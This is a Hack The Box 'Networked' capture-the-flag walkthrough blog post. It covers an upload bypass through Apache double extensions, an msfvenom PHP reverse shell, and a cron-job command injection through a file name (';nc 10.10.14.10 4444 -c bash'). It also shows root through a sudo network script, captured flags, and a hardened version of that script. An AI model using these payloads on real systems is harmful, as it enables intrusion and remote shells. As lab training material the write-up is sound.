Networked-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: directory scanning, file upload, Apache parsing vulnerability, bash script code analysis, environment-variable command injection, understanding the scandir() function, sudo privilege escalation

Reference: https://www.jgeek.cn/article/86

0x01 Getting user access

1. Get the target IP address: 10.10.10.146

2. Get the port information

┌──(kali㉿kali)-[~/桌面/htb-tools/portscan]
└─$ sudo ./htb-portscan.sh 10.10.10.146 tcp

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16

3. Take a look at what is served on port 80

4. Scan for directories

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.146
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.146/_23-12-14_21-15-44.txt

Target: http://10.10.10.146/

[21:15:44] Starting:
[21:16:50] 301 - 235B - /backup -> http://10.10.10.146/backup/
[21:16:50] 200 - 885B - /backup/
[21:16:57] 403 - 210B - /cgi-bin/
[21:17:50] 200 - 1KB - /photos.php
[21:18:20] 200 - 169B - /upload.php
[21:18:20] 301 - 236B - /uploads -> http://10.10.10.146/uploads/
[21:18:20] 200 - 2B - /uploads/
Task Completed

5. Retrieve what is under the /backup/ directory

6. There is a file upload function; generate a shell file locally

┌──(kali㉿kali)-[~/桌面]
└─$ msfvenom -p php/reverse_php LHOST=10.10.14.10 LPORT=443 -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 3007 bytes
Saved as: shell.php

7. The Apache here has a parsing vulnerability

Apache parses file names from right to left: even if the rightmost extension is listed in mime.types, as long as .php appears anywhere in the file name it can be handed to the PHP module. This does not depend on the Apache or PHP version; it is a parsing vulnerability caused by an improper user configuration, AddHandler application/x-httpd-php .php.

8. Upload the webshell via upload.php

http://10.10.10.146/upload.php

HTTP/1.1 200 OK
Date: Thu, 14 Dec 2023 14:34:16 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 37
Connection: close
Content-Type: text/html; charset=UTF-8

<p>file uploaded, refresh gallery</p>

9. Start an nc listener locally to catch the reverse shell

Visit the webshell URL: http://10.10.10.146/uploads/10_10_14_10.php.png

Listener output:

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.146] 45454
id
uid=48(apache) gid=48(apache) groups=48(apache)

10. By enumerating the directories, a useful script file was found

ls -la /home
total 8
drwxr-xr-x. 3 root root 18 Jul 2 2019 .
drwxr-xr-x. 17 root root 4096 Sep 7 2022 ..
drwxr-xr-x. 2 guly guly 4096 Sep 6 2022 guly
ls -la /home/guly
total 28
drwxr-xr-x. 2 guly guly 4096 Sep 6 2022 .
drwxr-xr-x. 3 root root 18 Jul 2 2019 ..
lrwxrwxrwx. 1 root root 9 Sep 7 2022 .bash_history -> /dev/null
-rw-r--r--. 1 guly guly 18 Oct 30 2018 .bash_logout
-rw-r--r--. 1 guly guly 193 Oct 30 2018 .bash_profile
-rw-r--r--. 1 guly guly 231 Oct 30 2018 .bashrc
-r--r--r--. 1 root root 782 Oct 30 2018 check_attack.php
-rw-r--r-- 1 root root 44 Oct 30 2018 crontab.guly
-r--------. 1 guly guly 33 Dec 14 13:55 user.txt
sh-4.2$ cat crontab.guly
cat crontab.guly
*/3 * * * * php /home/guly/check_attack.php
sh-4.2$ cat check_attack.php
cat check_attack.php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
    $msg='';
    if ($value == 'index.html') {
        continue;
    }
    #echo "-------------\n";

    #print "check: $value\n";
    list ($name,$ext) = getnameCheck($value);
    $check = check_ip($name,$value);

    if (!($check[0])) {
        echo "attack!\n";
        # todo: attach file
        file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

        exec("rm -f $logpath");
        # $value is a file name from the uploads directory, interpolated unescaped into a shell command
        exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
        echo "rm -f $path$value\n";
        mail($to, $msg, $msg, $headers, "-F$value");
    }
}

?>
sh-4.2$

11. From the reference article, the $value variable here is subject to command injection. exec() is called with the IP-style file name: the script reads the contents of the uploads folder, checks for files that match the naming convention, and passes them into functions that execute them. Combined with the earlier file upload, this value is under user control. The scandir() function returns an array of the files and directories in the specified directory.

12. cd to the uploads folder and use touch with double quotes to create a file whose name contains the nc command. Wait for the cron job to run, and you get a shell as guly:

sh-4.2$ cd /var/www/html/uploads/
cd /var/www/html/uploads/
sh-4.2$ ls
ls
10_10_14_10.php%00.png
10_10_14_10.php.png
10_10_14_10.png
127_0_0_1.png
127_0_0_2.png
127_0_0_3.png
127_0_0_4.png
index.html
sh-4.2$ touch ";nc 10.10.14.10 4444 -c bash"
touch ";nc 10.10.14.10 4444 -c bash"
sh-4.2$ ls
ls
10_10_14_10.php%00.png
10_10_14_10.php.png
10_10_14_10.png
127_0_0_1.png
127_0_0_2.png
127_0_0_3.png
127_0_0_4.png
;nc 10.10.14.10 4444 -c bash
index.html
sh-4.2$

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.146] 53302
id
uid=1000(guly) gid=1000(guly) groups=1000(guly)
python3 -c 'import pty;pty.spawn("/bin/bash")'
id
uid=1000(guly) gid=1000(guly) groups=1000(guly)

13. At this point the first flag file is obtained

id
uid=1000(guly) gid=1000(guly) groups=1000(guly)
ls
check_attack.php
crontab.guly
user.txt
cat user.txt
90d05ee195b57b1b017b120e73dea913

0x02 Getting root access

14. Check sudo -l

sudo -l
Matching Defaults entries for guly on networked:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User guly may run the following commands on networked:
(root) NOPASSWD: /usr/local/sbin/changename.sh

15. Look at that script file

cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        echo "interface $var:"
        read x
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        # the regexp allows spaces and $x is written unquoted; when ifup sources this file, anything after a space runs as a command
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done

/sbin/ifup guly0

ls -la /usr/local/sbin/changename.sh
-rwxr-xr-x 1 root root 422 Jul 8 2019 /usr/local/sbin/changename.sh
/usr/local/sbin/changename.sh

16. Following the https://www.jgeek.cn/article/86 article, this gives the final root shell directly

sudo /usr/local/sbin/changename.sh
interface NAME:
test /bin/bash
interface PROXY_METHOD:
wrong input, try again
interface PROXY_METHOD:
test
interface BROWSER_ONLY:
test
interface BOOTPROTO:
test
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
bcfba88056214e331d0d6a1c631709d2
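As an added example (not the box's script and not code from the referenced article), here is a hardened version of the input check in changename.sh: it keeps the original regexp only for comparison, adds one that rejects whitespace and backslashes, and single-quotes the value before it is written, so a line in the sourced ifcfg file can no longer turn into a second command. The function names and the sample inputs are my own.

```shell
#!/bin/sh
# Hardened input handling for a changename.sh-style script (added example).
# The original regexp '^[a-zA-Z0-9_\ /-]+$' admits spaces, so "test /bin/bash"
# passes; once ifup sources the generated ifcfg file, the unquoted line
# NAME=test /bin/bash executes /bin/bash with NAME=test in its environment.
# Two layers fix this: reject whitespace, and always quote the written value.

ORIG_RE='^[a-zA-Z0-9_\ /-]+$'   # as found on the box, kept for comparison
STRICT_RE='^[a-zA-Z0-9_/-]+$'   # no space, no backslash

# original_accepts VALUE: exit 0 if the box's regexp would accept VALUE
original_accepts() { printf '%s\n' "$1" | grep -Eq "$ORIG_RE"; }

# strict_accepts VALUE: exit 0 if the hardened regexp accepts VALUE
strict_accepts() { printf '%s\n' "$1" | grep -Eq "$STRICT_RE"; }

# render_line VAR VALUE: the ifcfg line to write, value single-quoted so the
# file stays safe to source even if the validation is loosened again later
render_line() { printf "%s='%s'\n" "$1" "$2"; }

# safe_line VAR VALUE: print the quoted line, or print nothing and return 1
safe_line() {
    strict_accepts "$2" || return 1
    render_line "$1" "$2"
}

# Demo on constructed inputs: the payload from the writeup and a benign name.
for v in 'test /bin/bash' 'guly0'; do
    safe_line NAME "$v" || echo "rejected: $v"
done
```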

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/203


https://sh1yan.top/2023/12/14/Networked-htb-writeup/
Author: shiyan
Published on: 14 December 2023